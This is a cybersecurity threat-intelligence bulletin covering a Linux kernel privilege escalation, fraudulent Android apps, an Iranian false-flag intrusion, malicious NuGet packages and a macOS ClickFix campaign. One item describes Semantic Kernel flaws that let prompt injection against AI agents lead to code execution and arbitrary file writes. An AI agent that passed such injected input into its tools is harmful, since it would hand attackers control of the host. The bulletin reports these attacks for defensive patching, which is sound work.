Threat Watch Feed
🚩 – IOCs Added
The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.
Dirty Frag Linux Kernel Vulnerability Chain Enables Local Root Privilege Escalation Across Major Distributions
Details were released for Dirty Frag, a Linux kernel local privilege escalation vulnerability chain that can allow an unprivileged local user to gain root access across major Linux distributions. The issue chains two page-cache write vulnerabilities in the xfrm-ESP/IPsec and RxRPC kernel paths, extending the same broader bug class as Dirty Pipe and Copy Fail. Public reporting notes that the embargo was broken before coordinated fixes were available across distributions, increasing urgency because exploit details and working proof-of-concept code were released publicly.
The vulnerability is considered especially concerning because it is described as deterministic rather than race-condition based, meaning exploitation does not rely on fragile timing and may be highly reliable when the required kernel interfaces are reachable. Reports note potential impact across Ubuntu 24.04.4, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10, and Fedora 44. The xfrm-ESP issue has been assigned CVE-2026-43284 and patched in mainline, while the RxRPC issue has been assigned CVE-2026-43500, with patch availability still limited at the time of reporting.
Impact: Successful exploitation may allow a local, unprivileged user to gain root privileges on affected Linux systems. This creates increased risk for multi-user servers, developer systems, shared hosting environments, and container platforms that run untrusted or third-party workloads. In containerized environments, Dirty Frag may also increase the risk of container escape scenarios where vulnerable kernel interfaces are exposed or where workload isolation is not sufficiently hardened.
Recommendation: Organizations should monitor vendor advisories and apply kernel updates as soon as patches are available for affected distributions. Until patches are deployed, access to the affected kernel paths should be reduced by preventing the vulnerable esp4, esp6, and rxrpc modules from loading where they are not required. Linux systems should be reviewed for local users or workloads with access to vulnerable interfaces, especially systems allowing untrusted shell access, shared development activity, or container workloads. Container environments should enforce hardened defaults such as restrictive seccomp, AppArmor or SELinux profiles, reduced capabilities, and limited access to kernel networking features. Systems with suspected exploitation should be investigated for unauthorized root-level changes, modified authentication files, unexpected setuid binaries, persistence artifacts, and suspicious activity from low-privileged accounts.
Semantic Kernel Vulnerabilities Could Allow Prompt Injection to Become Remote Code Execution
Microsoft reported two vulnerabilities in Semantic Kernel, CVE-2026-26030 and CVE-2026-25592, that could allow prompt injection against AI agents to escalate into host-level execution risks. The research highlights how AI agents connected to plugins or tools can introduce systemic risk when model-controlled parameters are passed into high-impact functions such as search filters, code execution plugins, file transfer helpers, or host filesystem operations.
CVE-2026-26030 affects Semantic Kernel Python versions before 1.39.4 when agents use the Search Plugin backed by the In-Memory Vector Store with default filter functionality. In that scenario, attacker-controlled prompt input could be interpolated into a Python lambda expression evaluated by the framework, allowing a crafted prompt to bypass blocklist-based validation and execute arbitrary code. CVE-2026-25592 affects Semantic Kernel .NET SDK versions before 1.71.0, where an exposed DownloadFileAsync function could allow AI-controlled file writes to arbitrary host paths, potentially enabling sandbox escape and persistence through locations such as the Windows Startup folder.
Impact: Successful exploitation could allow an attacker to move from prompt injection to code execution, arbitrary file write, sandbox escape, or host compromise depending on the vulnerable agent configuration. Affected agents may expose sensitive host files, write malicious payloads to persistence locations, spawn suspicious child processes, or execute commands from the agent host process. The risk is highest where AI agents process untrusted input and have access to plugins that interact with local files, code execution environments, search backends, or other system-level tools.
Recommendation: Organizations using Semantic Kernel should upgrade Python semantic-kernel deployments to version 1.39.4 or later and Semantic Kernel .NET SDK deployments to version 1.71.0 or later. AI agent tools should be reviewed to ensure model-controlled parameters are treated as untrusted input, especially for filesystem paths, code execution, search filters, shell commands, and upload/download functions. Existing deployments should be assessed for the vulnerable window before patching, with endpoint telemetry reviewed for suspicious child processes from agent hosts, unexpected outbound connections, unusual file writes, Startup folder modifications, or persistence artifacts. Agent architectures should limit exposed tools to the minimum required scope and enforce path allowlists, input validation, sandboxing, and host-level monitoring.
🚩 CallPhantom Fraudulent Apps Scam Over 7 Million Android Users with Fake Call Log Services
ESET researchers disclosed CallPhantom, a cluster of 28 fraudulent Android apps on Google Play collectively downloaded over 7.3 million times before removal, falsely claiming to provide call history, SMS records, and WhatsApp call logs for any phone number in exchange for payment. The apps primarily targeted users in India and Asia-Pacific regions, with India’s +91 country code preselected and support for UPI payment systems. Analysis revealed “call history” data is entirely fabricated, with apps generating random phone numbers matched with hardcoded names, call times, and durations embedded directly in code. Screenshots of fabricated data were included in app listings presented as functionality demonstrations.
The campaign utilized two main clusters: first cluster apps contained hardcoded names, country codes, and templates combined with randomly generated phone numbers shown as partial results requiring payment for full access; second cluster apps requested email addresses where “retrieved” call history would supposedly be delivered, with no data generation occurring until after payment. Payment methods violated Google Play policies, including subscriptions via official Google Play billing, third-party UPI payment apps with hardcoded or Firebase-fetched URLs allowing account changes, and direct payment card checkout forms embedded in apps. Subscription fees ranged from €5 to $80, with some apps displaying deceptive notifications styled as new emails claiming call history results had arrived to coax users into paying.
Impact: Apps do not request intrusive permissions and contain no functionality capable of retrieving real call, SMS, or WhatsApp data, as such retrieval is technically impossible without authorized access to telecommunications infrastructure. Some apps circumvented Google Play’s official billing system by pushing users toward third-party payments or direct card entry, complicating refund efforts and exposing victims to financial risk beyond Google’s refund protection. Users who subscribed via official Google Play billing may be eligible for refunds under Google’s policies, while purchases made via third-party payment apps or direct payment card entry cannot be refunded by Google, leaving users dependent on external payment providers or developers for recourse. The apps garnered numerous negative reviews from victims reporting scams and non-delivery of promised data.
Recommendation: Users who subscribed should cancel subscriptions through Google Play by tapping profile icons, navigating to Payments & subscriptions, selecting active subscriptions, and tapping Cancel subscription. Request refunds for Google Play purchases within allowed refund windows as described on Google’s support page, noting refund eligibility depends on time since purchase, item type, and Google’s refund policy. For purchases made outside Google Play through third-party services or direct card entry, contact payment providers or app developers directly as Google cannot cancel subscriptions or issue refunds for external payments. Organizations should educate users that retrieving call logs, SMS records, or messaging app histories for arbitrary phone numbers is technically impossible without authorized telecommunications infrastructure access. Report suspicious apps to Google through official channels when apps promise services requiring privileged access to telecommunications data without legitimate carrier partnerships.
🚩 State-backed MuddyWater masquerades as Chaos ransomware to enable stealthy espionage and data exfiltration
Researchers at Rapid7 reported in May 2026 that an intrusion initially attributed to Chaos ransomware was in fact a state-sponsored operation linked with moderate confidence to MuddyWater (Seedworm), affiliated with Iran’s Ministry of Intelligence and Security (MOIS). The attackers used a false-flag approach, leveraging Chaos ransomware branding to disguise espionage objectives. The campaign featured high-touch social engineering via Microsoft Teams, where attackers conducted live screen-sharing sessions to harvest credentials and manipulate MFA, followed by deployment of a custom RAT (“Game.exe”) and use of legitimate remote access tools.
The attack chain relied on interactive credential theft, RDP-based lateral movement, and persistence via tools like DWAgent and AnyDesk. A downloader (ms_upd.exe) fetched a trojanized WebView2-based RAT that communicated with C2 infrastructure and enabled command execution, file transfer, and long-term access. The operation skipped file encryption entirely, deviating from typical ransomware, and instead focused on data exfiltration and covert persistence, supported by infrastructure and code-signing artifacts previously tied to MuddyWater.
Impact: This campaign enables covert, long-term access to enterprise environments under the guise of ransomware, increasing the risk of undetected espionage, credential compromise, and data exfiltration. By blending criminal and state-sponsored tradecraft, attackers can delay detection, evade attribution, and maintain persistent footholds for follow-on operations or disruption.
Recommendation: Block or limit external Microsoft Teams chat requests, and train users to treat unsolicited “IT support” interactions as high risk, especially those involving screen sharing or credential entry. Enforce phishing-resistant MFA where possible and require step-up authentication for MFA changes or new device enrollment. Monitor for suspicious MFA resets or additions to user accounts. Limit use of remote access tools to approved systems only. Alert on new installations, unusual session origins, or remote access outside of normal hours. Block and alert on connections to known malicious domains and associated IPs. Proactively hunt for historical connections to known IOCs and investigate any host that is found in connection with them, even if no ransomware activity was observed.
🚩 Five Malicious NuGet Packages Impersonate Chinese .NET Libraries to Steal Developer Credentials, SSH Keys, and Cryptocurrency Wallets
Socket reported five malicious NuGet packages published by the account bmrxntfj that impersonate Chinese .NET UI and infrastructure libraries, including IR.DantUI, IR.Infrastructure.Core, IR.Infrastructure.DataService.Core, IR.iplus32, and IR.OscarUI. The packages contain functional .NET library code but include a .NET Reactor-protected infostealer payload that executes through a module initializer when the assembly is loaded, placing developer workstations, CI runners, and build servers at risk if the packages are restored and loaded in a .NET process. Across all versions, the packages have accumulated approximately 65,000 downloads, and Socket reported that the packages remained available on NuGet at the time of publication.
The campaign uses version rotation and unlisted package versions to reduce the usefulness of file-hash-based blocking, with 224 total versions observed across the five package IDs and 219 versions marked as unlisted while still remaining installable through direct version-pinned commands. The stealer targets browser credentials, cookies, session tokens, autofill data, payment data, cryptocurrency wallet extensions, desktop wallet files, SSH private keys, Outlook profiles, Steam session data, and files from common user directories. Stolen data is staged at C:\ProgramData\Microsoft OneDrive\keys.dat and exfiltrated to dns-providersa2[.]com, using randomized X-[a-z]{3} HTTP headers to complicate static network detection.
Impact: Successful execution may expose sensitive data from developer systems and CI/CD environments, including browser-saved credentials, authentication cookies, cloud or API credentials, SSH keys, cryptocurrency wallet data, Outlook profiles, Steam session data, and local files. Because the payload runs when the malicious assembly is loaded, affected build servers and developer workstations should be treated as potentially compromised even if the package appeared to function normally. The focus on NuGet dependencies also creates broader software supply chain risk, especially for organizations that rely on internal mirrors, private package naming conventions, or automated dependency restoration.
Recommendation: Organizations should search project files, package manifests, dependency lock files, build logs, and NuGet caches for IR.DantUI, IR.Infrastructure.Core, IR.Infrastructure.DataService.Core, IR.iplus32, or IR.OscarUI at any version. Systems that restored and loaded these packages should be investigated for credential exposure, with browser-saved passwords, session tokens, API keys, SSH private keys, cloud credentials, and cryptocurrency wallet secrets rotated where applicable. Monitoring should include DNS or outbound connections to dns-providersa2[.]com or 62[.]84[.]102[.]85, file creation at C:\ProgramData\Microsoft OneDrive\keys.dat, suspicious DLL loading from developer or CI environments, and outbound HTTP requests using randomized X-[a-z]{3} headers. Approved package sources and publishers should be validated, and malicious package IDs should be blocked across package managers, CI pipelines, and developer endpoints.
🚩ClickFix Campaign Targets macOS Users With Fake Utility Lures to Deliver Infostealers and Cryptocurrency Wallet Trojans
Microsoft reported an evolving ClickFix-style campaign targeting macOS users through fake troubleshooting guides, blog posts, and utility-themed pages that claim to help with issues such as disk space optimization or system maintenance. Instead of delivering traditional .dmg installers, recent activity instructs users to paste Terminal commands that use native macOS utilities such as curl, Base64, Gunzip, Bash, and osascript to retrieve and execute remotely hosted scripts. Microsoft observed multiple delivery paths, including a loader install campaign, a script install campaign, and a helper install campaign, all focused on sensitive data collection, persistence, and exfiltration.
The campaigns deliver or support infostealers such as Macsync, Shub Stealer, and AMOS, which can collect browser credentials, Keychain entries, iCloud data, media files, documents, Telegram data, and cryptocurrency wallet artifacts. Some variants also replace legitimate cryptocurrency wallet applications, including Ledger Wallet, Trezor Suite, and Exodus, with attacker-controlled versions. The malware establishes persistence through LaunchAgents or LaunchDaemons, stages collected data under temporary directories such as /tmp/shub_<random ID>/, and uses C2 infrastructure for exfiltration and remote command execution.
Impact: Successful execution may allow attackers to steal macOS credentials, browser data, Keychain contents, iCloud information, documents, media files, Telegram data, and cryptocurrency wallet keys. The replacement of legitimate wallet applications with trojanized versions creates additional risk because users may continue transacting through compromised apps without realizing the wallet software has been altered. Persistence through LaunchAgents, LaunchDaemons, hidden helper files, and backdoor-style bot components may also allow continued remote access after initial data theft.
Recommendation: Organizations should educate macOS users not to run Terminal commands copied from untrusted websites, blogs, forums, ads, or troubleshooting pages. Monitoring should focus on suspicious Terminal or shell activity involving curl, Base64 decoding, Gunzip, osascript, dscl, archive creation under /tmp, and HTTP POST exfiltration following access to sensitive folders. macOS endpoints should be reviewed for suspicious LaunchAgents or LaunchDaemons, including ~/LaunchAgents/com.google.keystone.agent.plist, ~/Library/LaunchAgents/com.<random value>.plist, and /Library/LaunchDaemons/com.finder.helper.plist, as well as staged files or folders such as /tmp/helper, /tmp/starter, and ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate. Access to reported ClickFix distribution domains and C2 infrastructure should be blocked where applicable, and cryptocurrency wallet applications should be validated for unauthorized replacement.cy wallets on macOS may want to verify the integrity of installed wallet applications, particularly Trezor Suite, Ledger Live, and Exodus, given the confirmed trojanization activity observed in this campaign.
Sign up here!
To receive the TIGR Threat Watch email bulletin and critical vulnerability notifications, simply complete the form below.
Follow on Twitter
@SRA_ThreatWatch will keep you up to date with the most recent posts on your social media feed.
Subscribe to the RSS
Just copy and add this link to your RSS app and be notified immediately when new intel is posted.
How to use RSS
Following the RSS feed is easy. RSS can be added in your Outlook desktop app, and there are many free RSS readers available for your mobile device.
To follow using Outlook:
- In Outlook, right-click the RSS Feeds folder and choose Add a New RSS Feed.
- In the New RSS Feed dialog box, enter the URL of the RSS Feed: https://sra.io/category/tigr/feed
(click here for detailed instructions and additional options for Outlook)
Popular mobile RSS reader apps include:
- Feedly
- NewsBlur
- RSS Reader
- Inoreader
After installing your preferred RSS reader, you will be able to add this feed by entering the URL: https://sra.io/category/tigr/feed
Threat Bulletin Archive
About TIGR Threat Watch
Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.